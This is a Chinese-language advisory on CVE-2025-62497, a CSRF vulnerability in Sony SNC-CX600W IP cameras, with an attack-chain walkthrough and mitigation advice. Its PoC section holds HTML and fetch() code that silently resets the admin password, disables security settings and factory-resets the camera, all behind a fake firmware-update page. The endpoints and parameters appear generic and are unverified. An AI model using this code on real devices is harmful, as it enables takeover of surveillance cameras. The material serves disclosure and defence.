CVE-2025-62497 | Sony SNC-CX600W 跨站请求伪造漏洞

漏洞信息

漏洞编号

CVE-2025-62497

漏洞类型

CSRF（跨站请求伪造）

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Sony SNC-CX600W IP摄像机

漏洞概述

CVE-2025-62497是索尼（Sony）公司生产的SNC-CX600W IP摄像机中存在的一个跨站请求伪造（CSRF）漏洞。该漏洞由JPCERT/CC的安全研究员vultures发现，编号为JVN75140384。SNC-CX600W是一款面向企业级应用的网络摄像机产品，广泛应用于监控和安防领域。该漏洞影响版本低于Ver.2.8.0的所有SNC-CX600W设备。攻击者可以通过精心构造的恶意网页，当已登录用户访问该页面时，利用用户已认证的会话执行未经授权的操作。这些操作可能包括修改设备配置、重置管理员密码、关闭安全功能等。由于该漏洞针对的是已认证用户，攻击难度较低，且攻击过程对用户透明，具有较高的实际威胁性。CVSS 3.1评分6.5分，属于中等严重程度，主要威胁在于完整性影响较高。

技术细节

跨站请求伪造（CSRF）是一种利用用户已认证身份的攻击方式。在SNC-CX600W摄像机的Web管理界面中，由于缺乏有效的CSRF令牌验证机制，攻击者可以诱导已登录用户访问恶意构造的HTML页面。该页面包含自动提交的表单或脚本，利用浏览器的Cookie自动携带机制，向摄像机管理接口发送请求。攻击者通常使用隐藏的iframe或自动提交的表单，将恶意请求伪装成正常用户操作。由于浏览器会自动将目标域名的Cookie附加到请求中，服务器无法区分这是用户主动操作还是被诱导的请求。攻击者可利用此漏洞执行设备配置修改、用户账户管理、固件更新等敏感操作。漏洞的利用条件为：用户已登录设备管理界面、用户访问攻击者构造的恶意页面、目标设备版本低于2.8.0。防御措施需要在关键操作中添加随机生成的CSRF token，并在服务端验证token的有效性。

攻击链分析

STEP 1

步骤1：侦察和信息收集

攻击者首先收集目标SNC-CX600W摄像机的信息，包括IP地址、管理界面URL、已知的API端点和管理功能。攻击者分析Web管理界面的请求格式和参数，为构造CSRF payload做准备。

STEP 2

步骤2：制作恶意页面

攻击者创建一个包含恶意表单的HTML页面，这些表单会自动提交到目标摄像机的管理接口。表单中包含需要执行的敏感操作，如修改密码、关闭安全功能等。页面通常伪装成正常内容以诱骗用户访问。

STEP 3

步骤3：社会工程攻击

攻击者通过钓鱼邮件、恶意链接、篡改网站等社会工程手段，诱导已登录SNC-CX600W管理界面的用户访问恶意页面。攻击者可能伪装成技术支持或系统管理员发送邮件。

STEP 4

步骤4：触发CSRF请求

当用户访问恶意页面时，页面中的JavaScript代码或自动提交的表单会向目标摄像机发送HTTP请求。由于用户浏览器中存储着有效的认证Cookie，浏览器会自动附加这些Cookie到请求中。

STEP 5

步骤5：执行未授权操作

目标摄像机收到带有有效Cookie的请求后，将其视为合法用户操作，执行攻击者指定的命令。这可能包括修改管理员密码、禁用安全功能、导出配置或执行设备重启等操作。

STEP 6

步骤6：持久化控制

攻击者利用新设置的密码或修改的配置获得设备的持久化访问权限，可能进一步进行横向移动、部署恶意固件或窃取监控视频数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-62497 CSRF PoC for Sony SNC-CX600W -->
<!-- This PoC demonstrates CSRF attack to change admin password -->
<!DOCTYPE html>
<html>
<head>
    <title>Camera Management</title>
</head>
<body>
    <h1>Camera Firmware Update</h1>
    <p>Please wait while updating camera firmware...</p>
    
    <!-- CSRF Attack Form - Change Admin Password -->
    <form id="csrfForm" action="http://TARGET_IP/cgi-bin/admin.cgi" method="POST" style="display:none;">
        <input type="hidden" name="action" value="user_password_change">
        <input type="hidden" name="username" value="admin">
        <input type="hidden" name="new_password" value="Hacked123!">
        <input type="hidden" name="confirm_password" value="Hacked123!">
    </form>
    
    <!-- CSRF Attack Form - Disable Security Features -->
    <form id="csrfForm2" action="http://TARGET_IP/cgi-bin/admin.cgi" method="POST" style="display:none;">
        <input type="hidden" name="action" value="security_settings">
        <input type="hidden" name="csrf_protection" value="disabled">
        <input type="hidden" name="session_timeout" value="0">
    </form>
    
    <!-- CSRF Attack Form - Configuration Reset -->
    <form id="csrfForm3" action="http://TARGET_IP/cgi-bin/admin.cgi" method="POST" style="display:none;">
        <input type="hidden" name="action" value="factory_reset">
        <input type="hidden" name="confirm" value="yes">
    </form>
    
    <script>
        // Auto-submit all forms sequentially
        document.getElementById('csrfForm').submit();
        setTimeout(function() {
            document.getElementById('csrfForm2').submit();
        }, 500);
        setTimeout(function() {
            document.getElementById('csrfForm3').submit();
        }, 1000);
    </script>
</body>
</html>

<!-- Alternative PoC using XMLHttpRequest for more stealthy attack -->
<script>
function csrfAttack() {
    const targets = [
        {url: 'http://TARGET_IP/cgi-bin/admin.cgi', data: 'action=user_password_change&username=admin&new_password=AttackerPass'},
        {url: 'http://TARGET_IP/cgi-bin/admin.cgi', data: 'action=reboot&confirm=yes'}
    ];
    
    targets.forEach((target, index) => {
        setTimeout(() => {
            fetch(target.url, {
                method: 'POST',
                credentials: 'include',
                headers: {'Content-Type': 'application/x-www-form-urlencoded'},
                body: target.data
            });
        }, index * 1000);
    });
}
csrfAttack();
</script>

影响范围

SNC-CX600W < Ver.2.8.0

防御指南

临时缓解措施

立即将SNC-CX600W固件升级到Ver.2.8.0或最新版本。在升级前，可采取以下临时缓解措施：1) 避免在访问其他网站时保持摄像机管理界面的登录状态；2) 使用独立的浏览器配置文件访问摄像机管理界面；3) 定期检查设备配置是否被意外修改；4) 监控网络流量，关注异常的摄像机管理接口请求；5) 限制管理界面的网络访问，仅允许受信任的IP地址访问；6) 使用VPN等安全通道访问设备管理界面。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-62497
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-62497
3 Details https://www.cvedetails.com/cve/CVE-2025-62497/
4 VulDB https://vuldb.com/cve/CVE-2025-62497
5 Link https://jvn.jp/en/jp/JVN75140384/
6 Link https://www.sony.com/electronics/support/ip-cameras-fixed/snc-cx600w